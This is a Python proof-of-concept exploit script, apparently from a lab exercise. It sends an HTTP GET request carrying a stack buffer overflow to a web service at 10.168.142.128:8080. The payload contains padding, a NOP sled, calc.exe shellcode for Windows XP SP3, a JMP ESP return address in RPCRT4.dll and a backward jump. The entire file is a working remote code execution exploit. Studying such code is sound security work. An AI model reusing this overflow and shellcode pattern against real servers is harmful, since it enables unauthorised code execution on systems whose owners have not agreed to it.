#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/04 19:01:38 dhn Exp $

import sys
import socket

class Exploit:
    def __init__(self, server, port, payload):
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect = s.connect((self._server, self._port))
        return s

    def run(self):
        try:
            s = self.__connect()
            print("[+] Sending payload to " + str(self._server))
            s.send(self._payload)
        except socket.error:
            print("[!] socket error")

if __name__ == "__main__":
    # calc.exe shellcode for WinXP SP3 
    shellcode = "\x31\xC9"              # xor ecx,ecx
    shellcode += "\x51"                 # push ecx
    shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
    shellcode += "\x54"                 # push dword ptr esp
    shellcode += "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7
    shellcode += "\xFF\xD0"             # call eax

    padding = "A" * 124
    padding += "\x90" * 32
    padding += shellcode
    padding += "\xcc" * (245 - 124 - 32 - len(shellcode))

    jmp_esp = "\xc2\x55\xe8\x77" # RPCRT4.dll
    jmp_back = "\xeb\x80"        # JMP $-126

    payload = padding
    payload += jmp_esp
    payload += jmp_back

    request = "GET /" + payload + " HTTP/1.1\r\n"
    request += "Host: 10.168.142.128:8080\r\n"
    request += "Accept: */*\r\n\r\n"

    exploit = Exploit("10.168.142.128", 8080, request)
    exploit.run()
